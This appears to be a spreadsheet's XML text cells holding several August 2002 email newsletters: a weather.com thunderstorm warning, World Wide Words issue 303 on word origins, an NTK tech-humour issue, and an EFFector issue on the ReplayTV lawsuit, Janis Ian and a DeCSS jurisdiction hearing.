http://www.weather.com/RealMedia/ads/click_lx.ads/email.weather.com/email/1524095381/PageSpon/New_Media_twc_email_spon3_text/email_text_01_0713.html/34316434343763383364356332313130?_RM_REDIR_=www.weather.com/outlook/recreation/golf----------SEVERE THUNDERSTORM WARNING NATIONAL WEATHER SERVICE ALBANY NY 518 PM EDT THU AUG 15 2002 THE NATIONAL WEATHER SERVICE IN ALBANY HAS ISSUED A * SEVERE THUNDERSTORM WARNING FOR...   CENTRAL RENSSELAER COUNTY IN EASTERN NEW YORK * UNTIL 545 PM EDT * AT 514 PM EDT...NATIONAL WEATHER SERVICE DOPPLER RADAR INDICATED A   SEVERE THUNDERSTORM NEAR WYNANTSKILL...OR ABOUT 3 MILES EAST OF   TROY...MOVING EAST AT 15 MPH. * THE SEVERE THUNDERSTORM WILL BE NEAR...   AVERILL PARK AND RAYMERTOWN AT 525 PM EDT   GRAFTON AND BERLIN AT 545 PM EDT THIS IS A DANGEROUS STORM. IF YOU ARE IN ITS PATH YOU SHOULD PREPARE FOR DAMAGING WINDS IN EXCESS OF 55 MPH...LARGE HAIL...AND VERY HEAVY RAIN. PEOPLE OUTSIDE SHOULD MOVE TO A SUBSTANTIAL SHELTER NOW. </t>
  </si>
  <si>
    <t>WORLD WIDE WORDS         ISSUE 303          Saturday 17 August 2002
-------------------------------------------------------------------
Sent each Saturday to 15,000+ subscribers in at least 119 countries
Editor: Michael Quinion, Thornbury, Bristol, UK      ISSN 1470-1448
-------------------------------------------------------------------
 IF YOU RESPOND TO THIS MAILING, REMEMBER TO CHANGE THE OUTGOING
   ADDRESS TO ONE OF THOSE IN THE 'CONTACT ADDRESSES' SECTION.
Contents
-------------------------------------------------------------------
1. Feedback, notes and comments.
2. Turns of Phrase: Asian Brown Cloud.
3. Weird Words: Pyknic.
4. Q&amp;A: Mash note.
5. Endnote.
A. Subscription commands.
B. Contact addresses.
1. Feedback, notes and comments
-------------------------------------------------------------------
MACHINIMA  My reputation for small errors continues to grow (I am
keeping quiet about the big ones) with a misprint in last week's
piece on this word. In the sentence giving the etymology, of all
places, I misspelled it "mechanima", thus confusing everybody.APPETITE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common.BUMBERSHOOT  Several subscribers have pointed out that the word is
in the lyric of a song sung by Dick Van Dyke in the film "Chitty
Chitty Bang Bang":  Me ol' bam-boo, me ol' bam-boo
  You'd better never bother with me ol' bam-boo
  You can have me hat or me bumbershoot
  But you'd better never bother with me ol' bam-booIt may be one reason why some Americans, not familiar with the word
in their own country, have come to believe it must be British.OLOGIES AND ISMS  The publication date of my book has been moved
back a week in the UK to 29 August. A review by Jonathon Green is
scheduled for the issue of 31 August (assuming nobody changes the
date again). See  for
more details and UK ordering information.
2. Turns of Phrase: Asian Brown Cloud
-------------------------------------------------------------------
As though we didn't have enough to worry about weather-wise, what
with global warming, the ozone hole, and the new El NiÃ±o season,
UN scientists have now identified this new threat to the world's
climate. It is a cloud of smog three kilometres deep, enveloping
the whole of southern Asia - a soup of industrial pollutants,
carbon monoxide from vehicle exhausts and particles of soot from
burning forests and millions of rural cooking fires. It blocks 15%
of sunlight, which reduces crop yields. It also creates acid rain,
leads to respiratory illnesses, reduces rainfall and causes extreme
weather events. Because the cloud is capable of being dispersed
rapidly around the world, it may affect a much wider area than just
Asia. The term "Asian Brown Cloud" seems to have been around for a
couple of years in scientific circles, but came to prominence this
week in a report prepared by a team of international climatologists
at the UN Environment Programme in preparation for the World Summit
on Sustainable Development in Johannesburg next week. The good
news, they say, is that unlike other causes of pollution and
climate change, this one is curable if Asians can shift to more
efficient ways of burning fuels.The "Asian Brown Cloud," a 2-mile-thick blanket of pollution over
South Asia, may be causing the premature deaths of half a million
people in India each year, deadly flooding in some areas and
drought in others, a new U.N.-sponsored study indicates.
                                   ["Los Angeles Times", Aug. 2002]A UN-backed study released on Friday said the "Asian Brown Cloud" -
a vast haze of pollution stretching across South Asia - is damaging
agriculture, modifying rainfall patterns and endangering the
population.
                                ["Agence France Presse", Aug. 2002]
3. Weird Words: Pyknic  /'pIknIk/
-------------------------------------------------------------------
Short and fat.Nothing to do with al-fresco meals, though it is said the same way
as "picnic".In the early years of the twentieth century the German psychiatrist
Ernst Kretschmer examined criminals to try to tie their physical
shape and constitution to their personalities and mental illnesses.
Tall and thin ones he called "asthenic" (or "leptosomic") and
considered them to be the sort that commits fraud and petty theft.
A second set were athletic types with well-developed muscles, whom
he concluded, unsurprisingly, were more likely to be violent. The
third sort were the "pyknic" ones, who seemed to be a mixture of
the other two kinds so far as their criminal tendencies were
concerned. He took "pyknic" from Greek "puknos", thick or close-
packed; it appeared first in his book "KÃ¶rperbau und Charakter"
(Physique and Character) in 1921, from where it soon moved into
English.The American psychologist William Sheldon built on and modified
Kretschmer's ideas, coming up with the three terms to describe body
types - "endomorph", "mesomorph" and "ectomorph" - that are now
more common. He considered Kretschmer's pyknic type to be a mixture
of the endomorph (with a soft round body tending to put on fat, the
Santa Claus type) and the mesomorph (with a compact, powerful, and
athletic body tending to the Tarzan or Mr Universe type) and came
up with the phrase "pyknic practical joke" to describe a person who
is muscular in early life but who later goes pear-shaped and
balloons out into obesity.
4. Q&amp;A
-------------------------------------------------------------------
Q. A friend and I were reading a recent article in the "New York
Times" that made mention of a "mash note". I had never heard this
term before, but I extrapolated that it is some sort of love note.
Is there a more specific meaning than a simple love note? And can
you give some insight as to the origin of the term? [Jane
Rosenthal, California]A. You're right about the meaning of the phrase.We have to go back some way to find the origin. The first form was
the word "mash" by itself. This was a slang term in the US in the
1870s for an infatuation or crush (a magazine in 1877 defined it as
"a deep but fleeting affection of the heart"). A "mash" could also
be a dandy or the object of one's affection (of either sex) or - as
a verb - to make amorous advances to a member of the opposite sex,
to flirt or seduce. A "masher" was a man who thought himself
irresistible to the female sex but whose advances were often
unwelcome.The evidence collected by Professor Lighter in the "Random House
Historical Dictionary of American Slang" and by others suggests
that it was originally a term used in and around the theatre.
Charles Godfrey Leland (best known for his "Hans BreitmannÂ’s
Ballads" about a German immigrant) wrote a note above his poem,
"The Masher", dated about 1895, confirming this:  The word to "mash," in the sense of causing love or
  attracting by a glance or fascinating look, came into
  ordinary slang from the American stage. Thus an actress
  was often fined for "mashing" or smiling at men in the
  audience."Mash" and its derivatives crossed the Atlantic to Britain about
1880. "Masher" in particular became a term in London society,
especially among the more raffish supper-club and theatre-going
classes, for a type of fashionable male. The Oxford English
Dictionary defines it (with a distinctly maidenly air of drawing
away its collective skirts) as "a fop of affected manners and
exaggerated style of dress who frequented music-halls and
fashionable promenades and who posed as a 'lady-killer'", noting
that the word had been common "in 1882 and for a few years after".
In a letter from London in the old "Overland Monthly and Out West
Magazine" in 1889, a correspondent described a member of an
impoverished theatrical company: "This dashing youth was distinctly
conscious of his fascinations for the buxom maids who sighed beside
us, and the airy and elegant nonchalance of the glances that
superbly took them in would be a lesson for champion 'mashers' of a
far higher class".A "mash note" (in its first appearances, "mash letter") was an
obvious enough extension: a love letter. It is recorded first in
1880 and - as you have discovered - is still doing well.Where "mash" and its relatives come from has been a subject of
debate. It is sometimes said that it is from the standard English
word meaning to make soft by one of various means, with its obvious
reference to rendering the object of one's attentions pliable and
yielding. Max Beerbohm, writing in London in 1894 (mashers were
still around then, despite the OED's comment) remarked that some
people derived it from "Ma ChÃ¨re", "the mode of address used by the
gilded youth to the barmaids of the period". But he thought it
really came from "the chorus of a song, which, at that time, had a
great vogue in the music-halls: 'I'm the slashing, dashing, mashing
Montmorency of the day.'" We're pretty sure now that he was wrong,
but he could hardly know that.Back to Charles Leland again. Apart from his humorous writings, he
also researched and wrote a great deal about the Romany language as
well as Gypsy songs and customs. The following note from the
introduction to the poem gives an origin that is now widely
accepted:  It was introduced by the well-known gypsy family of actors,
  C., among whom Romany was habitually spoken. The word
  "masher" or "mash" means in that tongue to allure, delude,
  or entice. It was doubtless much aided in its popularity by
  its quasi-identity with the English word. But there can be
  no doubt as to the gypsy origin of "mash" as used on the
  stage. I am indebted for this information to the late well-
  known impresario Palmer of New York, and I made a note of
  it years before the term had become at all popular.Though defunct in British English, "mash" and "masher" have never
quite gone away in America. "Mash" had a resurgence of popularity
as student slang in the 1980s in the sense of necking or petting,
though that may be a back-formation from "mash note".
5. Endnote
-------------------------------------------------------------------
"A Spanish lady asked an acquaintance during a visit to Ireland
whether there was a word in his language similar to 'manaÃ±a'. The
Irishman thought for a moment, then said: 'Sure there is, but it
doesn't have the same sense of urgency.'" [Traditional Irish joke.]
A. Subscription commands
-------------------------------------------------------------------
To leave the list, change your subscription address, or subscribe,
please visit .Or, you can send a message to 
from the address at which you are (or want to be) subscribed:  To leave, send: SIGNOFF WORLDWIDEWORDS
  To join, send: SUBSCRIBE WORLDWIDEWORDS First-name Last-name
B. Contact addresses
-------------------------------------------------------------------
Do not use the address that comes up when you hit 'Reply' on this
mailing, or your message will be sent to an electronic dead-letter
office. Either create a new message, or change the outgoing 'To:'
address to one of these:  For general comments, especially responses to Q&amp;A pieces:
      .
  For questions intended for reply in a future Q&amp;A feature:
      .-------------------------------------------------------------------
World Wide Words is copyright (c) Michael Quinion 2002.  All rights
reserved. The Words Web site is at .
-------------------------------------------------------------------
You may reproduce this newsletter in whole or in part in other free
media online provided that you include this note and the copyright
notice above. Reproduction in print media or on Web sites requires
prior permission: contact .
-------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve"> __  __ _2002-08-16   _ _____ _  __
|  \/  (_)_ __ (_) \ | |_   _| |/ /    o Join! mail an empty message to
| |\/| | | '_ \| |  \| | | | | ' /     o ntknow-subscribe@lists.ntk.net
| |  | | | | | | | |\  | | | | . \     o Website (+ archive) lives at:
|_|  |_|_|_| |_|_|_| \_| |_| |_|\_\    o      http://www.ntk.net/
                                &gt;&gt; MINI NEWS &lt;&lt;
                               time for a snooze         There comes a time in every August when news services should
         just shut the hell up, because the weather's too hot or too
         underwater, and the world grows so dull and hazy that even
         the overexcitable hardcore at LinuxWorld wander around like
         it's Undead Expo 2002, and the Weiss-baked Macintoxins can
         barely lift their wallets for MacOS X.2, and Sun can't be
         bothered to do anything but run s/RedHat/Sun Linux/g on a
         free distribution disk, and everyone else is on holiday, or
         getting ready to be on holiday, or being told that perhaps
         they should take a holiday RIGHT NOW, and all we can do is
         look at this awful, awful EUCD legislation and stare out the
         window until dawn.         Yeah, it's our annual no news edition. We moved to a faster
         server. Do take the rest of the weekend off in celebration.         Or, alternatively, build up a head of overexcitement for
         the public appearance of THOMAS DOLBY - the "Hyperactive"
         chart artist and Beatnik audio plug-in advocate who, even as
         you read this, appears to be hosting a 350 Euro-per-head
         seminar on COMPOSING POLYPHONIC RING TONES at Helsinki's
         Radisson Royal Hotel in Finland. Lucky delegates will learn
         about "using real-time MIDI controllers for tweaked
         effects", "techniques for making little speakers sound huge"
         and - perhaps most distressingly - "picking the right
         instrument and register for best audibility". The
         cacophonous cavalcade comes to London's Soho House on Tue
         and Wed next week if you'd like to check it out for
         yourself - or perhaps hold a street protest on behalf of
         music lovers worldwide.
         http://www.headspace.com/seminar2002.htm
           - So they're better than monophonic ringtones. What isn't?
                                &gt;&gt; ANTI-NEWS &lt;&lt;
                             berating the obvious         because there are still a few PUERILE GOOGLE MISSPELLINGS
         that NTK doesn't come top of the search results for - yet:
         http://www.google.com/search?q=partnershit&amp;start=10 , "anals
         of history", "blackpoo", "farternity", "proffesional" - the
         latter particularly in conjunction with "proofreading":
         http://www.google.com/search?q=proffesional+proofreading ...
         "Subie" called "ya ,jhg hjg yjg" by unashamedly Glaswegian
         DAILY RECORD: http://www.ntk.net/2002/08/16/dohsub.gif ...
         looks like his official title now becomes "President Buh":
         http://www.ntk.net/2002/08/16/dohbuh.gif ... frickin' MAC
         users buy anything: http://www.ntk.net/2002/08/09/dohsx.gif
         ... maybe not the best month for this branch of the W3C:
         http://lists.w3.org/Archives/Public/www-forms-editor/2002Mar/ ...
                               &gt;&gt; EVENT QUEUE &lt;&lt;
                         goto's considered non-harmful         Boasting technical seminars, interplay of technological ideas
         and, of course, beer, this year's LINUXBIERWANDERUNG (from Sat
         2002-08-24, Doolin, Co. Clare, Ireland, for a "small voluntary
         donation" per hiker) might just be the only walking holiday
         you ever persuade your company to pay for. Continuing the
         outdoor theme, somewhat shorter notice for this Sunday's
         GREATER LONDON LINUX USER GROUP BLETCHLEY PARK PICNIC (around
         12noon, Sun 2002-08-18, Bletchley, near Milton Keynes, UKP6
         admission fee). And for anyone who can't make the whole week
         in Ireland, there's some consolation in the form of LONDON
         PERLMONGERS PRESENT: DAMIEN CONWAY AT THE CONWAY HALL (6pm,
         Tue 2002-08-27 and Thu 2002-08-29, Conway Hall, London WC1R,
         free) - hopefully just the start of a similarly-named speaker/
         venue trend which will also see Larry Wall performing at the
         Great Wall Of China, and Eric Raymond at London's Raymond
         Revue Bar.
         http://www.lbw2002.draiocht.net/
         - sadly, less excuse for "pingtime for Hitler" gag this year
         http://list.ftech.net/pipermail/gllug/2002-August/025308.html
           - bring your "Cryptonomicon", please don't deface his Wiki
         http://london.pm.org/meetings/
              - last time: http://www.bluedust.com/projects/info7.asp
         http://www.gabba.net/pnp/lofi.asp
         - Plug'n'Play this Sun, feat. Casiotone &amp; Thorsten Sideboard
         http://www.ica.org.uk/index.cfm?articleid=7641
           - and Hacking @ ICA tonight, assuming you get this in time
                                &gt;&gt; TRACKING &lt;&lt;
               sufficiently advanced technology : the gathering         Dijkstra finally gone? Great. Now we can hang out with those
         sloppy little unrigorous languages he never let into the
         house. Right on cue: the latest dev version of GNU
         SMALLTALK, that dirty treat-me-like-an-object ducky. Version
         2.0b sprouts HTML-embedding and experimental MySQL support -
         implying you might actually be able to do something useful
         with it. Admittedly, "useful" has not been a word  much used
         in the Smalltalk community recently. Many of the current
         addicts seem to live entirely in the pleasuredomes of that
         Land of Infinite Fun, Alan Kay's Smalltalk sequel SQUEAK,
         the cross-platform UI-kablooie playground which, over time,
         been overloaded with more ill-fitting metaphors than this
         sentence. But even Squeak is showing signs of returning to
         planet Earth. Talk of cleaning up the object tree are rife;
         coders are working on XP-alike skins (instead of Squeak's
         peculiarly homely interface right now). There's even word of
         a SmallTalkish scripting language in the offing. And all
         those new MacOS X Objective C hackers are following the
         trail back to the NeXT's great ancestor, giving a timely
         boost to the tribe. Xerox Parc *will* return!
         http://freshmeat.net/releases/93723/
                                              - the smaller Smalltalk
         http://www.squeak.org/download/
                                                  - pretty colours
         http://lists.squeakfoundation.org/pipermail/squeak-dev/
                                           - where they're all hiding
         http://www.iam.unibe.ch/~ducasse/WebPages/FreeBooks.html
                                               - look! free ST books!
         http://www.pocketsmalltalk.com/
                                               - look! free Palm IDE!                                &gt;&gt; MEMEPOOL &lt;&lt;
                  ceci n'est pas une http://www.gagpipe.com/         where's Wendy?: http://3gamerchicks.com/features/bobsex/ ...
         http://news.bbc.co.uk/1/hi/2188214.stm got a bargain from:
     http://www.salon.com/tech/feature/2002/08/03/deleteddomains/print.html
         - still, makes a change from press releases from BT OPENWORLD:
         http://news.bbc.co.uk/1/hi/technology/2181078.stm ... life
         imitates http://www.thebrainstrust.co.uk/article.15.1961.html
         (from last summer); in the meantime, we can look forward to:
         http://www.martian.fm/countdown_it.htm ... at last - Java
         PARADROID: http://www.javaonthebrain.com/java/noids/ ... so
         has "10,000 Statistically Grammar-Average Fake Band Names"
         been taken?: http://web.media.mit.edu/~bwhitman/10000.html ...
         UNWITTING DOUBLE-ENTENDRE CORNER - "Genetic Distribution of
         the Labial Flap": http://www.sil.org/silewp/2001/002/ vs a
         trained eye on "The lines, crevices, and folds of your fanny":
         http://www.jacquelinestallone.com/reportsDocs/rumpology.html ...
                                &gt;&gt; GEEK MEDIA &lt;&lt;
                                  get out less         TV&gt;&gt; the objection that "Elvis - was a hero to most, but he
         never meant shit to me" is addressed in ENTERTAINING ELVIS
         (1.35am, Fri, ITV), in which "The King" offers his views on
         our modern-day pop acts... the horror continues in the form of
         CANDYMAN II (1.10am, Fri, C4) and William Peter "The Exorcist"
         Blatty's psycho-nonsense THE NINTH CONFIGURATION (2.45am, Fri,
         C4)... and Jason "Seinfeld" Alexander plays one of a bunch of
         gay friends - not that there's anything wrong with that - in
         LOVE! VALOUR! COMPASSION! (12.40am, Fri, C5)... Jarvis Cocker
         *is* Rolf Harris, while "Allstars" impersonate the recently
         deceased "Steps" in CELEBRITY STARS IN THEIR EYES (8.30pm,
         Sat, ITV)... Sarah Michelle Gellar and Selma "Legally Blonde"
         Blair put the "les" back into "Les Liaisons Dangereuses" in
         their noted http://www.girlskissing.co.uk/video.htm classic
         CRUEL INTENTIONS (9.30pm, Sat, C4)... leading into a late-
         night character actor fest featuring Paul "Boogie Nights"
         Anderson's feature debut HARD EIGHT (12.35am, Sat, BBC2),
         David Mamet's Steve Martin con-game THE SPANISH PRISONER
         (1.20am, Sat, C4), and Oirish juvenile delinquent coming-of-
         ager THE BUTCHER BOY (12.55am, Sat, C5)... things get back to
         normal on Sunday with the incomprehensible remake of MISSION:
         IMPOSSIBLE (8.15pm, Sun, BBC1) - not to be confused with the
         simultaneously fruitless THE HUNT FOR THE ANTHRAX KILLER (9pm,
         Sun, BBC2)... Christina Ricci, Lisa Kudrow comedy THE OPPOSITE
         OF SEX (10pm, Sum, C4) has snappy script, no plot... and it's
         the final episode of the seemingly interminable 24 (10pm, Sun,
         BBC2): http://www.doyourecall.co.uk/ ... the - presumably
         rhetorically titled - DID BARRY GEORGE KILL JILL DANDO? (9pm,
         Mon, C4) and WHO KILLED SIMONE VALENTINE? (11.05pm, Mon, C4)
         are helpfully scheduled either either side of SIX FEET UNDER
         (10pm, Mon, C4)... Michael "David St Hubbins" McKean moves
         into management in sub-"Spinal Tap" hostage romp AIRHEADS
         (10.55pm, Mon, C5)... the consistently worrying TEENAGE KICKS
         (10pm, Tue, C4) looks at "Teenage Dwarfs" - next week:
         "Teenage Dirtbags"?... and http://www.diffusiononline.net/
         inspiration BARGAIN HUNT (8pm, Thu, BBC1) arrives on prime-
         time - frankly we still prefer his mix of "147 Lockdown"...         FILM&gt;&gt; if they'd used the proper mathematical sigma symbol in
         the title, then the sequel could have been called "The
         Derivative Of Distress - With Respect To Terror" for largely
         humourless feelgood nuclear thriller THE SUM OF ALL FEARS
       ( http://www.screenit.com/movies/2002/the_sum_of_all_fears.html :
         We see [Bridget "Coyote Ugly" Moynahan] in bed, showing some
         cleavage; the camera briefly focuses on some cheerleaders'
         clothed butts during the Super Bowl)... oh and it's the full
         release this week for SPY KIDS 2: THE ISLAND OF LOST DREAMS
         ( http://www.capalert.com/capreports/spykids2.htm : telepathy;
         pelvic thrusts by a child; drinking with multiple drugging;
         "Let's kick their [posteriors]" - which is not included in the
         list of three/four letter word vocabulary but is impudent;
         toilet humor - smothering in a pile of dung with fecal matter
         in mouth)...         CONFECTIONERY THEORY&gt;&gt; "Are you tracking breakfast cereal?"
         inquired a concerned LLOYD WOOD, after recently wandering into
         the "kiddy end" of the cereal aisle. "They've all gone CD-ROM
         on the front", he observed - causing him, for a moment to
         think he was looking at "some really bloated computer
         magazines". Of course we are, Lloyd, though we're not as
         easily swayed by gimmicks as you are, and thus can impartially
         report that NESTLE's Maryland-style COOKIE CRISP are the most
         biscuit-like breakfast ever, easily triumphing over KELLOGG's
         FROSTIES CHOCOLATE (too much chocolate, not enough "frosty"),
         COCO POPS CRUNCHERS (clump together in this humid weather) and
         even the Winnie The Pooh-themed DISNEY HUNNY B's - and if you
         mix them all together, the milk goes so chocolatey it'll turn
         your Pooh brown... elsewhere in dairy, MCDONALD'S continue a
         disappointing run of toppings for the MCFLURRY (99p) -
         Cadbury's Caramel is rubbish, and Jammie Dodgers not a patch
         on our second-favourite McFlurry of all time, the Strawberry
         Crunch: http://www.ntk.net/index.cgi?b=02001-08-10&amp;l=286#l .
         Reader ED AVIS complains that KFC don't tell you that their
         "M&amp;M" AVALANCHE (also 99p) does not feature real M&amp;Ms but
         "special miniaturised ones", which he describes as "frozen
         solid" and "might as well be small bits of gravel for all the
         chocolate flavour they impart". While, following last week's
         announcement of Ice T's Posse Pops, CRAIG LEFF thought we'd be
         reassured by the news that NBC are launching their own range
         of TV-themed Baskin-Robbins ice-creams, including a "Fear
         Factor" flavour designed to recreate the experience of eating
         "dirt and spiders": http://www.adage.com/news.cms?newsId=35520
         ... back with confectionery, LEON VERRALL remained unimpressed
         with STARBURST FRUITINESSE (from 49p, "tasted of plastic...
         [resembled] those 'food pills' they thought we'd all be eating
         by now"), DAVID BLANE grudgingly approved of the TWIX TRIPLE
         CHOC LIMITED EDITION ("Not bad, faintly evoking Penguins,
         which I never liked because of the thick chocolate"), and the
         whole point of that controversial "It's not for girls"
         campaign was revealed: to position NESTLE DOUBLE CREAM (40p)
         as a more female-friendly version of the YORKIE BAR. Other
         treats to look forward to in coming weeks: Cola-flavoured
         CADBURY-TREBOR REFRESHERS, chicken-wings-flavoured HULA HOOPS,
         bacon QUAVERS, the (presumably) non-crisp-like GOLDEN WONDER
         FRUIT WONDERS - or, indeed, any of this weird new American
         stuff: http://www.candyusa.org/Press/New/ace2002.shtml ,
         ranging from SCORNED WOMAN CHOCOLATE JALAPENO FUDGE to SOFT
         AND CHEWY STINKY FEET ("Mmm, these feet are *so* stinky")...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thanks Edge, knew you had a worse picture somewhere"
                         (p014, Edge, September 2002)
                                 NEED TO KNOW
            THEY STOLE OUR REVOLUTION. NOW WE'RE STEALING IT BACK.
                         Archive - http://www.ntk.net/
              Unsubscribe? Mail ntknow-unsubscribe@lists.ntk.net
                Subscribe? Mail ntknow-subscribe@lists.ntk.net
   NTK is supported by UNFORTU.NET, and by you: http://www.geekstyle.co.uk/
                          (K) 2001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</si>
  <si>
    <t>EFFector       Vol. 15, No. 25        August 16, 2002     ren@eff.orgA Publication of the Electronic Frontier Foundation     ISSN 1062-9424
In the 225th Issue of EFFector:    * Judge Grants Consumer Voice in ReplayTV Lawsuit
    * Musician Disputes Industry's Stance on Music Sharing
    * Shake Your Money Maker; EFF Is Throwing a Party Next Thursday!
    * Join the Fun at EFF's VIP Party with Wil Wheaton!
    * Court Hearing Set in DeCSS Publication Jurisdiction Case
    * Deep Links: Lawrence Lessig's Second-to-Last Speech on Copyright
    * Deep Links: The "Total Information Awareness System," or, How 
      to Build a Police State
    * Deep Links: Can the Digital Hub Survive Hollywood?
    * AdministriviaFor more information on EFF activities &amp; alerts: http://www.eff.org/To join EFF or make an additional donation:
  http://www.eff.org/support/
EFF is a member-supported nonprofit. Please sign up as a member today!
* Judge Grants Consumer Voice in ReplayTV Lawsuit  Hollywood Tries to Skip Over Consumers' ConcernsLos Angeles -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DVRs."We're pleased the court has recognized that the debate about digital
video recorders must include the customers who purchase and use the
devices," said Electronic Frontier Foundation (EFF) Intellectual
Property Attorney Robin Gross."[T]he issue of whether the Newmark Plaintiffs' use of the ReplayTV
DVRs' send-show and commercial-skipping features constitutes fair use
will most likely figure prominently in both the ReplayTV action and
the Newmark action," wrote Judge Cooper in her opinion.Responding to the entertainment industry's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industries.The entertainment industry claims that commercial skipping infringes
copyright and digital recording aids piracy."I'm not a crook if I skip commercials or share a news interview of
myself with my mom using the SendShow feature rather than sending her
a videotape," said Craig Newmark, founder of craigslist.org and a
ReplayTV owner. "I shouldn't have to worry about getting prosecuted,
but the Turner Broadcasting CEO tells us that taking a bathroom break
is criminal. We even have Senators urging Attorney General Ashcroft to
prosecute people who share files."Along with Newmark, ReplayTV customers filing the lawsuit with legal
representation by the EFF are: Keith Ogden, owner of a financial
broker firm in San Francisco; Shawn Hughes, a small business owner in
Georgia; Seattle journalist Glenn Fleishman; and southern Californian
video engineer Phil Wright.Links:For this release:
http://www.eff.org/IP/Video/Newmark_v_Turner/20020816_eff_pr.htmlCourt order denying dismissal and combining the ReplayTV cases:
http://www.eff.org/IP/Video/Newmark_v_Turner/20020816_consolidation_granted.htmlFor more information on the ReplayTV customers' suit:
http://www.eff.org/IP/Video/Newmark_v_Turner/For more information on the entertainment industry's suit:
http://www.eff.org/IP/Video/Paramount_v_ReplayTV/EFF Fair Use FAQ:
http://www.eff.org/IP/eff_fair_use_faq.html- end -
* Musician Disputes Industry's Stance on Music Sharing  Janis Ian Urges Artists Speak Out, Support Free DownloadsSan Francisco - Grammy-winning songwriter and recording artist Janis
Ian today challenged the music industry by celebrating peer-to-peer
(P2P) music sharing as a boon to musicians.Ian, who is in the San Francisco Bay Area as part of her current
concert tour, recently published "The Internet Debacle," a pointed
critique of the music industry's disregard for musicians and consumers
who want to distribute and acquire music online. The Electronic
Frontier Foundation (EFF) applauds Ian's actions and hopes that others
will see the Internet as an aid, not a threat, to musicians.In the article, Ian assails the major record labels' argument that P2P
file-sharing is harming artists."Free Internet downloads are good for the music industry and its
artists," explains Ian. "Every act that can't get signed to a major,
for whatever reason, can reach literally millions of new listeners,
enticing them to buy the CD and come to the concerts."She adds that during the heyday of Napster she saw a marked increase
in CD sales from her website. She attacks technological and political
measures meant to harm consumers by restricting their right to copy
and back up their legally purchased music.Ian will play on August 17 in San Rafael, CA.During her 17 album career, Ian has earned nine Grammy nominations and
three awards. Her best known songs include 1967's "Society's Child"
and 1975's "At Seventeen." More recently, her 1993 album "Breaking
Silence" was nominated for a Grammy Award as Contemporary Folk Album
of the Year. Her songs have been recorded by artists ranging from
Bette Midler to Cher, from Glen Campbell to Vanilla Fudge, and from
Joan Baez to Etta James.
Links:For this release:
http://www.eff.org/IP/P2P/20020815_eff_pr.htmlJanis Ian's "Internet Debacle" article:
http://www.janisian.com/article-internet_debacle.htmlJanis Ian's follow-up article:
http://www.janisian.com/article-fallout.htmlJanis Ian's tour information:
http://www.janisian.com/tourinfo.html- end -
* EFF CAFE 2002 - a Benefit for EFF's Campaign for Audiovisual 
  Free Expression  Support Free Expression and See Barney-Wheaton Deathmatch  Thursday, August 22nd, 2002/ 9pm - afterhoursSan Francisco - Join the hottest DJs of the electronic dance music
scene, celebrity boxers, and the foremost cyberspace activists as we
party to protect the future of music. The Electronic Frontier
Foundation presents CAFE 2002 - a Benefit for EFF's Campaign for
Audio-Visual Free Expression at 9 p.m. on Thursday, August 22nd, 2002
at the DNA Lounge in San Francisco. Admission is on a sliding scale
and begins at $10.The night features world-class DJs, live acts, and producers from all
parts of the fast-growing electronic music community and a special
treat: celebrity boxing with Wil Wheaton and Barney the purple
dinosaur! Wil Wheaton, of Star Trek: The Next Generation and Stand By
Me fame, will take on Barney in a celebrity boxing matchup for the
history books. All proceeds from the event will directly benefit EFF's
CAFE project, helping to preserve your freedom to express yourself in
innovative ways.For more information, see:
http://www.eff.org/cafeOr contact:
Katina Bishop
Director of Education and Offline Activism
Electronic Frontier Foundation
415-436-9333 x101
katina@eff.org- end -
* Join the Fun at EFF's VIP Party with Wil Wheaton!Did you love/hate him on Star Trek: The Next Generation? Did you
laugh/cringe in sympathy at the leeches scene in Stand By Me? Need one
last signature to round out your autograph collection of childhood
movie stars?Do we even need to ask how you feel about Barney the purple dinosaur?RSVP quickly for the Electronic Frontier Foundation's (EFF) VIP Party
with Wil Wheaton immediately preceding CAFE 2002: a Benefit for EFF's
Campaign for Audio-Visual Free Expression.Join Wheaton and the foremost cyberspace activists for drinks in the
upstairs room of the DNA Lounge, San Francisco's leading dance club.
Enjoy free drinks, good company, and excellent music. Take the battle
against Barney and his legal thugs into your own hands with a swing at
EFF's ferocious Barney pinata.Former technology entrepeneur and cypherpunk Sameer Parekh, now an
electronic musician and event promoter, will play a mix of fresh
minimal techno and electro for your aural edification.All proceeds from the event will directly benefit EFF's CAFE project,
helping to preserve your freedom to express yourself in innovative
ways. Tickets are $50 (includes cost of CAFE 2002 and two drinks).When: August 22, 2002 at 8:00 p.m.
Where: The DNA Lounge 375 Eleventh Street, San Francisco, CA 94103
21+ w/ID, NO EXCEPTIONSTo reserve your ticket, contact:
Katina Bishop
EFF Education Director
415-436-9333 x101
katina@eff.org- end -
* Court Hearing Set in DeCSS Publication Jurisdiction CaseOn September 5, 2002, the California Supreme Court will hear oral
arguments about whether a California court has jurisdiction over
Matthew Pavlovich, an Indiana college student who is a resident of
Texas, for his hosting of an Internet mailing list. Pavlovich
maintained the mailing list for the LiVid programming group, which
provides a unified development and user resource center for video and
DVD-related work for the Linux operating system. One of the group's
projects was to create a DVD player for computer systems that run
Linux. As part of that effort, DeCSS, a program that decrypts the copy
protection on DVDs, was published on the group's mailing list. The
entertainment industry has sued Pavlovich in California court, and
last year a California appellate court ruled Pavlovich was within the
state court's jurisdiction since he published information that relates
to the entertainment industry, which is based in California.EFF and Pavlovich's legal team argue that Pavlovich is outside of
California's jurisdiction since he was a college student in Indiana
with no contacts to California when DeCSS was published on the LiVid
list. The hearing on September 5 will take place in San Francisco.
Links:For more info on the case:
http://www.eff.org/IP/DVDCCA_case/- end -
Deep Links
Deep Links is a new department in the EFFector featuring noteworthy
news items, victories and threats from around the Internet.* Lawrence Lessig's Second-to-Last Speech on CopyrightLawrence Lessig gave one of his last public speeches on copyright at
the O'Reilly Open Source Conference. He will be taking time off of the
speaking circuit to prepare for the Eldred v. Archroft case, which he
is arguing before the Supreme Court this fall. Copies of the speech
are available in many formats here:
http://randomfoo.net/oscon/2002/lessig/- end -* The "Total Information Awareness System"A colorful diagram of John Poindexter's scary plan to eliminate
terrorists.
http://www.darpa.mil/iao/TIASystems.htm- end -* Can the Digital Hub Survive Hollywood?Cory Doctorow on how innovation and technology suffer at the hands of
the content industry.
http://www.tidbits.com/database-cache/tbart06901.html- end -
*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plese visit http://action.eff.org/subscribe/.
&gt;&gt;From there, you can update all your information. If you have already
subscribed to the EFF Action Center, please visit
http://action.eff.org/action/login.asp.(Please ask ren@eff.org to manually remove you from the list if this
does not work for you for some reason.)Back issues are available at:
  http://www.eff.org/effectorTo get the latest issue, send any message to
effector-reflector@eff.org (or er@eff.org), and it will be mailed to
